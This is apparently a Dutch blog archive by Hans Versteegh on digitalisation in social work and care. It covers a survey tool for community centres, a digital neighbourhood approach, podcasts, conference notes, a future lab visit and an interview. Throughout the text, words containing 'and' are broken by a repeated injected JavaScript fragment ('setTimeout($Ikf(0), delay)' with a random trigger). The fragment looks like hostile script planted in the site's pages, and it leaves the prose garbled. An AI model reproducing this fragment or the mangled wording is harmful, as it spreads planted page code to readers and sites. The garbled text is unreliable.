Categoriearchief: Utrecht

Column Zorg en Welzijn 12, 2018, High Tech, RodeKersen

Het wijkcentrum waar ik werkte moest sluiten, bezuinigingen. Geschrokken gingen we bij alle gebruikers een enquête afnemen en lieten een petitie tekenen. De klinkende resultaten boden we aan de wethouder aan. Maar man, wat was dat werken! En natuurlijk veel te laat, want het beeld was al gevormd; die tent kon wel sluiten. Zo geschiedde. Wel met dit grote winpunt; de gebruikers kregen het in zelfbeheer.

Hadden we eerder gebruikers kunnen betrekken? Wellicht, als toen RodeKersen had bestaan. RodeKersen is een nieuwe methodiek om gebruikerstevredenheid te meten. Ontwikkeld door WijkConnect en Bouwstenen voor Sociaal i.s.m. 25 locaties: buurthuizen, wijkcentra en multifunctionele accommodaties.

Voordat we op vakantie gaan, doen we het allemaal; reviews bekijken. Voor maatschappelijk vastgoed nog niet, gek eigenlijk. Als een soort ‘Tripadvisor voor maatschappelijk vastgoed’ kun je met RodeKersen gebruikers hun mening laten geven.

Uitgangspunt is eenvoud. RodeKersen is een enquête op maat gemaakt voor je locatie, met een mobiel vriendelijke online versie en een printversie. De belangrijkste vragen over gebouw, gastvrijheid en activiteiten zijn opgenomen om tevredenheid te meten. Open vragen geven een indruk over het belang van de plek in de wijk; doen we er eigenlijk toe?

De exploitant, beheerder of organisator van activiteiten krijgt inzicht in kwaliteit en maatschappelijke impact van de locatie. In 2018 doen 40 locaties mee.

Een eenvoudig en effectief instrument. Voor ons was het wijkcentrum al de kers op de slagroomtaart, hiermee hadden we het kunnen bewijzen.

Meer lezen? http://www.bouwstenen.nl/rodekersen-reviewsystematiek-voor-wijkvoorzieningen

Hans Versteegh, Welzijn 3.0

Heb jij al een digitale wijkaanpak? (Blog Zorg en Welzijn september 2018)

Een digitale wijkaanpak haakt aan bij de leefwereld van bewoners en past bij hoe dingen in deze tijd vorm krijgen. Zo kan je samen aan een leefklimaat werken waarin iedereen in de wijk op digitaal gebied kennis, vaardigheden, een netwerk en kansen krijgt.

Samenwerken

Iets bereiken doe je zelden in je eentje. In het sociaalwerk is samenwerken ingebakken. Je werkt samen met vrijwilligers, bewonersorganisaties, de woningbouw, scholen, de bibliotheek, ondernemers, politie, zorgpartijen, de gemeente en al je collega’s. Als het goed is doe je dat vanuit een gezamenlijke visie en een gezamenlijk bepaalde koers; de integrale wijkaanpak.

Nee, stop nu niet met lezen, het is minder erg dan je denkt. Ik weet dat zo’n document als een saaie molensteen om je nek kan voelen. Het is ook een kans om jouw ei kwijt te raken. En samen met andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anderen mooie dingen voor je werkgebied te doen. Waar gaan jullie de schouders onder zetten?

Integraal en digitaal

Mag ik zo vrij zijn je één ding mee te geven? Maak er een IDW van. Een Integrale Digitale Wijkaanpak. Wat mij betreft als aanhangsel bij het hoofddocument. Maar heb aandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andacht voor onze digitaal ingerichte maatschappij. Alle partijen die ik heb genoemd zijn online te vinden. Check ze maar eens.

Dat biedt kansen. Want zoals je samen eenzaamheid bestrijdt, samen preventief aan gezondheid werkt, samen de sociale cohesie bevordert, samen een veilige wijk maakt waarin het prettig wonen en opgroeien is, zo kan je samen ook aan een digitaal leefklimaat werken waarin iedereen in de wijk op digitaal gebied kennis, vaardigheden, een netwerk en kansen krijgt.

Laaghangend fruit

Aangezien alles en iedereen tegenwoordig digitaal actief is, durf ik te stellen dat je ook bovenstaandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ande maatschappelijke opgaven gemakkelijker kunt bereiken, wanneer je oog hebt voor digitalisering. De kansen die er liggen zijn vaak laaghangend fruit.

Eenzaamheid kan je deels tegen gaan door ouderen op Facebook een venster op de samenleving te geven. En ze in staat te stellen hun betekenisvolle contacten met familie en vrienden warm te houden. Een Facebookgroep als verlengstuk van een activiteit in het buurthuis?

Gezondheid bevorder je door het wandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andelgroepje een app laten te gebruiken die de routes en aantal stappen bijhoudt. Zo breng je een klein wedstrijdelement in, gamification, dat stimuleert.

Met WhatsApp bouw je makkelijker aan onderlinge bewonerscontacten. Via groepen per straat of buurt. Met bv. een paar moeders als beheerders. Ga eens per maandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and met die groep koffiedrinken. Gezelligheid en sociale verbondenheid gegarandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andeerd.

In de driehoek van thuis, school en wijk geef je kinderen én hun ouders kansen om digivaardiger te worden. In samenhang van jullie activiteiten bereid je hen voor op een samenleving die nog veel digitaler zal zijn en die zij gaan bouwen. Leer ze coderen, met games onderwerpen in de wijk oplossen en stel ethische vragen.

Wat te doen?

Onderzoek het, probeer het, laat je informeren en opleiden, en agendeer digitalisering op momenten waar de koers bepaald wordt en zoek partners. Misschien ben jij het wel die dit op de agenda van de Integrale Digitale Wijkaanpak gaat zetten, zodat initiatieven als deze gaan gebeuren?

Tot slot

Een Integrale Digitale Wijkaanpak sluit aan bij de leefwereld van bewoners, draagt bij aan het oplossen van maatschappelijke vraagstukken en past bij hoe dingen in deze tijd vorm krijgen.

Een wijkaanpak zónder aandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andacht voor digitalisering?

Kan …

Maar ik geloof er niet meer in.

P.s. In de Utrechtse wijk Zuilen zijn scholen, Mira Media en welzijnsorganisatie Me’kaar al bezig met het uitvoeren van een soort IDW. Lees hier meer: https://www.mediawijzer.net/digitale-geletterdheid-in-de-wijk/

Twee reacties op dit artikel:

Grappig, hoe dit stuk perfect aansluit op waar we nu in Woudenberg ook over nadenken. Hoe we “het echte leven in de buurt” kunnen bereiken en versterken door digitale middelen in te zetten. Meer dan duizend manieren, keuzes te over, je advies ook dit “gewoon” in een aanpak te vangen is eigenlijk zo logisch… dat we daar zelf nog niet op gekomen zijn!
Jessica Willems-de Lange, netwerkregisseur

Goed hoe je met relatief eenvoudige, praktische voorbeelden laat zien hoe sociale media ondersteunend kan zijn aan het werken in de wijk.
Diana van Vessem, Teammanager sociale wijkteams

 

Podcast Welzijn 3.0

Wauw, wat ben ik blij met de twee podcasts die Jelle de Boer, bekend van zijn vlogs in sociaal werk, van en met mij maakte. Hij wilde wel eens weten hoe dat nou zit, met digitalisering in het sociaal werk. Interessante kost dus.

1e podcast, Jelle de Boer over deze podcast Welzijn 3.0

“In deze eerste aflevering van De Socialogen ga ik in gesprek met Hans Versteegh. Hans is een doorgewinterde sociaal werker en expert in Nederlandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and op het gebied van de inzet van social media in het sociaal werk. We hebben een leerzaam gesprek over de intrede van social media in het werkveld en daarbij dus de digitalisering als onderdeel van ons vak. De vraag is dus niet of je mee moet doen met de digitalisering als sociaal werker, maar de vraag is hoe je dit op een goede manier kunt doen. Welke keuzes kun je maken en wat kan het je opleveren?Wat is het belang van deelname aan online communities als sociaal werker? Ook bespreken we twee uitersten: Aan de ene kant De digitale kloof en aan de andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andere kant de vraag of robots het sociaal werk in de toekomst van de mens kan overnemen.”

2e Podcast,

#8 Hans Versteegh – Zo word je DIGIVAARDIG in het sociaal werk

Jelle over deze Podcast:

“Hans Versteegh is een van de experts in Nederlandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and op het gebied van digitalisering in het sociaal werk en schreef in 2019 het boek Digivaardig sociaal werk – Handom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andboek voor de digitale transitie. Door de coronacrisis is zijn kennis in dit boek is nu nog relevanter dan het al was. In deze nieuwe Zichtbaar met Jelle podcast legt Hans uit hoe de digitale transitie er in het sociaal domein vandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andaag de dag uitziet. Ook legt hij praktisch en concreet uit welke stappen jij als sociaal professional kunt maken om deze transitie zelf efficiënt, planmatig en succesvol te kunnen maken. ”

Vond je dit interessant en wil je In contact komen met Hans / Welzijn 3.0 om te informeren naar wat hij in jouw organisatie kan betekenen? Bel dan naar 06 44 06 20 29 of mail naar info@welzijn30.nl

Wil je in contact komen met Jelle?
Kijk op www.jelledeboer.nu of www.facebook.com/zichtbaarmetjelle of mail naar info@jelledeboer.nu

Kijk ook op https://www.welzijn30.nl/

Podcast Welzijn 3.0

Mijn tuinkantoor als opname studio, weer eens wat andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anders. Podcast Welzijn 3.0

BewarenBewaren

Aantekeningen werkconferentie digivaardig in de zorg

Werkconferentie “Digivaardig in de zorg”

Door VWS en ECP, donderdag 29 juni, Utrecht

Geeft de standom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and van zaken op dit moment weer m.b.t. het thema digitalisering van het sociaal domein, omdat dit overeenkomt met de ontwikkelingen in de zorg. Een en al inspiratie.

Hashtag om terug te lezen: #zorgdigivaardig

Platform voor de informatiesamenleving

Coalitie Digivaardig

Onderzoekt

 • e-skills voor zorgprofessionals
 • Digivaardig en de arbeidsmarkt
 • Uitslagen zelf-test
 • Rol van de manager / bestuurder

Bewustwording / activering

2017: digivaardig in de zorg: nodig en zichtbaar

Groei belang e-health en digivaardigheden in de zorg

 • Voelbaar en zichtbaar bij zorginstellingen, zorgprofessionals
 • Cijfers e-health monitor NICTIZ
 • Brede aandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andacht e-health: bv zie #ehw17
 • Brede aandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andacht digitale vaardigheden (OCW/BZK/EZ)
 • Groei coalitie dv in de zorg
 • (Aangenomen) motie Tweede Kamer op dit gebied
 • VWS: kamerbrief 20 juli 2017: digitale vaardigheden en zorginnovatie

Naar een programma digivaardig in de zorg voor de komende (kabinets-)periode

Bron: latulippe.et.al. JMRI 2017

 • 90% van de Nederlandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anders heeft internet, maar dat geld niet voor mensen binnen zorginstellingen
 • 40% van de kwetsbaren heeft geen internet
 • 25% hiervan vindt internet moeilijk
 • 30% heeft moeite met het verwerken van informatie
 • 50% heeft moeite met eigen regie

Zorgverleners zien meer mogelijkheden voor e-health dan cliënten.

Van de cliënten geeft 50% aan er behoefte aan te hebben. Maar:

 • De techniek moet goed werken
 • De kennis en kunde van gebruikers moet op pijl zijn
 • Het moet goed aangeboden worden
 • Vanuit krachtige organisaties
 • Met een faciliterende context, denk aan wetgeving en financiering

Wie gaat deze mensen bij de handom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and nemen?

En wie de zorgprofessionals en de mantelzorgers?

Betere bij- / nascholing is nodig

Betere internetverbindingen binnen de zorg

Bij de doelgroep passende toepassingen

DIGITALE VAARDIGHEDEN

Aanwijsbare doelgroepen:

Burger, Patiënt, Mantelzorger — Zorgmedewerker — ICT-er in de zorg — Leidinggevenden — opleiding / onderwijs

Vanuit de Burger, Patiënt, Mantelzorger

Missie: Alle patiënten /mantelzorgers / naasten voldoende digivaardig

Voorbeeld: patiënten dossiers, beeldbellen, lab-waarden diabetes, etc.

Mogelijke activiteiten:

 • Methode om vast t stellen of de client over de vaardigheden beschikt / MBO
 • Coaching materiaal voor zorgverlener als digi-coach
 • E-health modules in bestaandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ande computercursussen voor ouderen, gehandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andicapten, kwetsbaren
 • Mantelzorger als digi-coach: ondersteuningsmateriaal of ondersteuning
 • Aansluiten bij patiënts-included
 • Doorverwijsplek digitaal hulplijn van BZK / (zorg specifiek) digivaardig te maken

De burger wil op het juiste moment de juiste informatie via het juiste kanaal.

Bijvoorbeeld een Whatsapp als herinnering voor een afspraak, een filmpje over een behandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andeling en over de weg in het ziekenhuis. Aangeboden door een partij die vertrouwen geeft.

Er is behoefte aan:

 • Zorgverleners met oog voor behoeften
 • Begrijpelijke zorg
 • Een keurmerk
 • Een overzicht van beschikbare tools
 • Een checklist voor digitale tools

Vanuit de zorgprofessional

Missie: alle zorgprofessionals voldoende digivaardig,

Zorgprofessionals als coach van cliënten die zelf zoeken welke ICT / digitale tools nodig zijn om gezond te blijven en / of beter te worden. Niet zorgen voor maar mensen die zelf hun zorg vorm geven. Mensen kunnen zo ook uit de zorg gehouden worden (population health management)

Hoe sluit je als professional aan op wat mensen zelf in huis hebben gehaald? Hoe hou je het veilig?

De zorgketen gaat op de kop. Terwijl de gevestigde orde zich moet houden aan wetten en standom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andaarden als ISO en HL7Fire etc.

Voorbeeld: basisvaardig (EPD), interactie patiënt (beeldbellen), innovatie (andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anders werken)

Mogelijke activiteiten:

 • Bewustwordingscursus slimmerwerkenindezorgin1minuut.nl verder verspreiden
 • Zelf test uitbreiden en breder verspreiden
 • Digitale vaardigheden in BIG-opleidingen
 • Ondersteuning voor super-users: opleiding, begrip van rol, samenwerking met andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anderen, connectie ICT-afdeling, etc.

Er is behoefte aan:

 • Kennis en bewustwording van ICT / digitale mogelijkheden
 • Kennis om er gebruik van te kunnen maken
 • Ervaren wat het is
 • Tijd om te proberen
 • Technologie die aansluit bij de professional
 • Keep It Simple Stupid (KISS)
 • Integratie in het dagelijkse vak
 • Deskundigheidsbevordering
 • Herhalen en coachen
 • Coaching: in korte perioden van herhaling om kennis te laten beklijven. “Ik kan het niet de hele dag.” “Ik moet een knop omzetten.”
 • Borgen in visie en beleid

Vanuit de ICT-professional

Missie: zorgen voor voldoende ICT-ers in de zorg, die optimaal binnen hun nieuwe rol functioneren

Voorbeeld: helpen zorgprofessionals, helpen managers, nieuwe ICT mogelijkheden, samenwerking over de grenzen heen

Mogelijke activiteiten:

 • Met de beroepsgroep een Body of Knowledge en Skills opzetten voor de zorginformatieprofessional 3.0
 • Bewustmakingscampagne vanuit het begrip zorginformatieprofessional 3.0
 • Enthousiasme professionals over het vak overbrengen aan jongeren om tekort te voorkomen (geef ICT door variant)

Vraagstuk: kan de zorgprofessional praten met de ICT-er? En kan die praten met de klant?

Dit is nodig:

 • Business ICT alignement, goede ICT die effectief, veilig en efficiënt is, plus vaardigheden en skills.
 • In de zorg de juiste ICT ondersteuning leveren
 • Een nieuwe rol voor ICT-ers
 • Meer rond communiceren en bruggen bouwen dan fysiek bouwen
 • Geen aparte discipline maar onderdeel van het bedrijfsproces

Vanuit leidinggevenden / bestuurders

Missie: alle leidinggevenden in de zorg voldoende digivaardig

Voorbeeld: andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andere competenties medewerkers, standom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andaardisatie, uitwisseling, etc.

Mogelijke activiteiten:

 • Een campagne waarin rolmodellen, exemplarische management vraagstukken issues over managementdilemma’s wordt gestimuleerd
 • Leercirkels / leertafels waarin managers en bestuurders hun dilemma’s bespreken
 • E-health leiderschap / management in opleidingen voor zorgmanagement

Er is behoefte aan:

 • Een visie en strategie rond digitalisering
 • Standom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andaarden
 • Zorgverzekeraars kunnen aansporen en moeten ruimte bieden
 • Cultuurverandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andering
 • Implementatie in de eigen organisatie
 • Een groter kennisniveau van bestuurders
 • Aansluiten bij landom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andelijke bewegingen

Vanuit opleidingen

Missie: zorgopleidingen hebben e-health geïncorporeerd in hun curriculum

Voorbeeld: in opleidingen MBO-V, HBO-V etc. ook e-health in technische opleidingen

 • Concrete aanbevelingen op et terrein van e-health in zorgonderwijs concreet uitwerken
 • Concrete invulling van / samenwerking met zorgpacten
 • Vooroplopende opleidingen een podium geven om hun voortrekkersrol te vervullen, bijvoorbeeld door een conferentie voor zorgopleidingen te organiseren

Dit is nodig:

 • Inspiratie en toonaangevende voorbeelden
 • Living labs en smartlabs om te experimenteren en te leren
 • Een kennisplatform
 • Zorgprofessionals die ICT toepassen
 • Inclusief onderwijs

Wie heb je voor je en voor wie is welke digitale tool geschikt?

Beelden gebruiken, ook naar zorgverleners zelf

Perspectief (door mij geformuleerd)

Over 4 jaar hebben zorgverleners kennis van digitale mogelijkheden, scholen zij zich daarin blijvend bij op hun 24th century skills en werken zij als digi-zorgcoach naar hulp behoevenden die zelf de regie in handom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anden (kunnen) hebben en hun eigen zorgafname vorm geven. En zijn zij bruggenbouwers naar de eigen organisatie en aanbieders.

Dus … zij geven advies en implementeren digitale zorg middelen:

“dit kan er, zullen we?”

Kijk voor inspiratie ook naar andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andere sectoren zoals de veehouderij die van iedere koe precies weet hoe die er voor staat. En naar de transport sector die goederenstromen feilloos ingericht heeft.

De rol die VWS voor zichzelf ziet is:

 • Afstemmen van 4 ministeries (VWS, EZ, BZK en OCW)
 • Voorbeelden delen
 • Met als startpunt telkens de burger / de patiënt
 • Vruchtbare grond leveren voor verdere ontwikkeling
 • Schouderklopjes uitdelen

(dit viel mij eerlijk gezegd wat tegen van het ministerie, HV)

Sociale technologie is “Super cool!”

Dat was de reactie van mijn oudste dochter van 8 op wat er allemaal te zien en uit te proberen (!) is in het Permanent Future Lab in Utrecht. Maar hoe kwamen we daar verzeild?

MOVISIE organiseerde op 18 februari 2016 een -gratis- inspiratiemiddag rondom sociale technologie. Met verschillende interessante workshops waaronder een over de
nieuwste technologische snufjes. Met enthousiasme verzorgd door Jethro Hardeman en Evelyn Visschedijk .

Robot 1 en 2 Permanent Future Lab

Kleine robot vangt een grote

In een razend tempo kwamen aan de ordeKahoot waarmee je gaming in je lessituatie haalt, vertaal-apps voor communicatie met vluchtelingen, de vraag van de klant letterlijk in kaart brengen met heatmaps, het platform voor jongeren met eetstoornissen Proud2beme, de Muse; een mindfulness
sensor om mee te mediteren, de nieuwste virtual reality bril van HTC, leren met angsten om te gaan met Mindlight, stress meten aan de handom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and van je huid met een andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and”>wearable om je pols, communiceren via oplichtende en trillende stenen, en je eigen hulpverlener in Amsterdam vergelijken en uitkiezen. En om dit technologische geweld allemaal meteen maar weer te relativeren lieten ze dit komische filmpje zien.

De organisatoren van deze inspiratiemiddag vroegen de deelnemers hun belangrijkste inzicht te delen. Mij inzicht was dat mijn twee dochters van 4 en 8 niet lang zullen hoeven te wachten voor al deze technologie gangbaar, sociaal toepasbaar en geaccepteerd zal zijn.

3D printen Permanent Future lab

Met onze neus bovenop 3D-printen

De dingen die werden getoond zijn nu in ontwikkeling of zijn al op de markt. Mijn oudste wil bijvoorbeeld al een hoverboard en verzint terloops in de keuken, terwijl ik sta te koken, een vuilnisbak die van kleur verandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anderd zodra die vol is.

Dus het werd tijd dat deze spruit eens goed ondergedompeld werd in die steeds maar verder ontwikkelende wereld. En natuurlijk vind papa dat zelf ook bere-interessant!

Robot 3 Permanent Future Lab

Een aaibaar klein robotje

Op naar het Permanent Future Lab (video) in Utrecht dus.

Nooit van gehoord? Kan kloppen, het zit een beetje verstopt. Vlak bij Utrecht Centraal Station, inwonend bij Seats2meet. Ook nooit geweest? Oh, dat is zo’n plek waar je met je laptop crashed en cocreëert met al die andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andere likeminded peoples die hun ding doen maar dat ook best willen delen om samen de wereld weer iets mooier te maken. Ik zit er zelf ook wel eens te werken.

Permanent Future Lab (artikel) is een van de drie plekken in Nederlandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and waar iedereen mag spelen met robots, sensoren, virtual reality brillen en 3D-priners. Een walhalla voor mijn dochter, die eerst wat aarzelend was maar al heel snel de smaak te pakken kreeg. Ze probeerde van alles uit, daarbij aangemoedigd door de super vriendelijke mensen van het lab, die ook niet te beroerd waren om alles uit te leggen.

Virtual reality box Permanent Future Lab

Super cool! Voor het eerst virtual reality ervaren.

En ook ik vond mijzelf terug, zwevend als astronaut op een ruimtewandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andeling, terwijl vlak achter de enorme aardbol net de zon opkwam. Ik zag dat Europa nog in de nacht lag, met de lampjes van de grote steden duidelijk zichtbaar. Zo prachtig dat ik een selfie maakte. Natuurlijk niet echt. Maar virtueel reëel.

 

 

En dat is dan meteen het enige nadeel van dit bezoekje. Dochter wil nu natuurlijk ook een virtual reality bril, maar ik aarzel nog om daar 800 dollar op stuk te slaan. Gelukkig zijn ze er ook vanaf net geen 20 euro … van karton.

De mensen achter Welzijn 2.0, Pascal van Wanrooy


Wie zijn de mensen achter Welzijn2.0?
Deze reeks ontmoetingen laat de mensen zien die de term Welzijn 2.0 inhoud geven. De zichtbare en de minder zichtbare. Wie zijn het, wat doen ze, wat drijft hen? Hieronder leest u de eerste ontmoeting met:  
Pascal van Wanrooy (1969) is werkzaam als ondersteuner bij Alleato, het Utrechtse provinciaal kennisinstituut voor zorg en welzijn. Pascal heeft o.a. als aandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andachtsveld social media en adviseert / begeleidt verschillende zorg -en welzijnsinstellingen in de regio Utrecht.
Social media leeft in deze regio. Vele organisaties willen er wat mee maar zij zijn nog vaak zoekende. Men heeft geen beeld bij welke vormen er bestaan, geen beeld van het proces om te komen tot nuttige social media toepassingen. Kortom, enig advieswerk is welkom. Pascal is betrokken bij trajecten binnen de Gemeente Utrecht, Portaal, Puls, Zuwezorg, Abrona, Reinaerde, Stichting Welzijn Amersfoort (mijn club), etc. Mogelijk gemaakt door een stimuleringsbijdrage vanuit de Provincie Utrecht.
In de zonnige achtertuin van Alleato in het centrum van Utrecht vroeg ik Pascal naar zijn ideeën rondom social media. Met zijn achtergrond als bioloog stelt hij dat de mens een sociaal wezen is, dat zich beter voelt als het samen werkt met andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anderen. Je voelt je immers veiliger in een omgeving waar je de andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ander kent, dan in een omgeving waar de andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ander een onbekende voor je is. Samenwerken vergroot dus je gevoel van veiligheid.
Als voorbeeld haalde hij een onderzoek met apen aan. Een deel van de apen zat in hokjes naast elkaar. Die konden elkaar dus wel horen en ruiken maar niet zien. Een andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andere groep apen was wel in staat elkaar te ontmoeten en aan te raken. De eerste groep was beduidend stressvoller dan de tweede. “Vervang nu die apen eens door mensen en de zie de hokjes als een flatgebouw,” opperde Pascal.
Naast het streven je veiligheid te vergroten heeft ieder mens ook een intrinsieke motivatie om iets voor een andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ander te doen. Een soort sociale verplichting die je voelt. Die wederkerigheid zit in ieder van ons. Op basis daarvan heeft Pascal in Utrecht Zuid het project Tijd voor elkaar opgestart. Geïnspireerd op Marktplaats maar dan aangevuld met een vorm van burenhulp. Diensten worden niet verkocht maar geruild. Interactie die betekenisvol is voor de gever en de ontvanger. Mensen die aarzelen, kunnen aankloppen bij een ondersteuner (sociaal makelaar).
Neem die oudere mevrouw die opgenomen werd in het ziekenhuis en iemandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and zocht die haar planten water wilde geven. Via Tijd voor elkaar bleek dat vlak bij haar een man woonde die dat wel wilde doen. Ze kenden elkaar niet, ook al woonden ze ”om de hoek”. Maar het tot standom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and gebrachte contact beviel beiden uiteindelijk zo goed dat hij nu ook de tuin van mevrouw bij houdt.
Direct om hulp vragen of voor hulp aanbellen is vaak een hoge drempel. Op het internet de vraag stellen is open, je bent  vrij om te reageren of te negeren, je bent tot niets verplicht. Daar geld niet dat je moet helpen, maar “Ik wil en ik kan je helpen, want andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anders was ik niet op deze site aan het kijken.” Dat is volgens Pascal ook de essentie van WEB 2.0; ik wil, niet ik moet.
Welzijn verandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andert. Mensen verbinden zich op diverse manieren, in verschillende omgevingen, in andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andere netwerken en op diverse momenten. Mensen gaan meer en meer hun eigen welzijn vormgeven. Los van instellingen, procedures, regels. De systeemwereld verliest terrein aan de leefwereld. Social media maken dat mogelijk en doen dat soms erg krachtig. Pascal noemt een voorbeeld van een leerling die voor zijn maatschappelijke stage in een verzorgingshuis een mevrouw trof die graag eens naar het park zou gaan. Hij maakte dat in zijn schoolnetwerk op Hyves kenbaar. Mede studenten pikten dit op en binnen vier dagen ging een groep leerlingen en andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andere mensen die zich betrokken voelden met de bewoners van het verzorgingshuis een dagje naar het park.
Welzijnswerkers kunnen dit soort dingen onverklaarbaar en wellicht schokkerend vinden. “Waar zijn wij mee bezig, waar zijn die andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anderen mee bezig?” Ze vinden het vervolgens maar eng en onbegrip overheerst. Volgens Pascal is dat slechts een kwestie van het ontbreken van basisvaardigheden op de computer bij veel welzijnswerkers. Een kennisachterstandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and dus.  Werkers moeten social media gaan ervaren. Ga met iets beginnen. Vaak gebruiken ze privé al You Tube, fotosites, prijsvergelijkingsites, Marktplaats enz., maar beseffen ze niet dat dit vormen van social media zijn. De nieuw lichting welzijnswerkers die afstudeert is al veel bekender met deze materie. De achterstandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and zal dus worden ingelopen.
Voor diegene die al wel overtuigd is van het nut van inzet van social media binnen welzijn heeft Pascal nog wel een aantal tips. Geloof er in, inspireer andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anderen, streef soms naïef je doelen na, ook al is dat misschien niet het meest realistisch op dat moment en deel je kennis op basis van vertrouwen. Sociaal zijn in het dagelijks leven (in real life, IRL) of binnen WEB 2.0, het is hetzelfde proces. Je stapt uit de anonimiteit, je laat jezelf zien (profiel en foto)en gaat verbindingen / relaties met andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anderen aan. Wees niet bang, begin!
U bent van harte welkom om uw reactie hieronder achter te laten.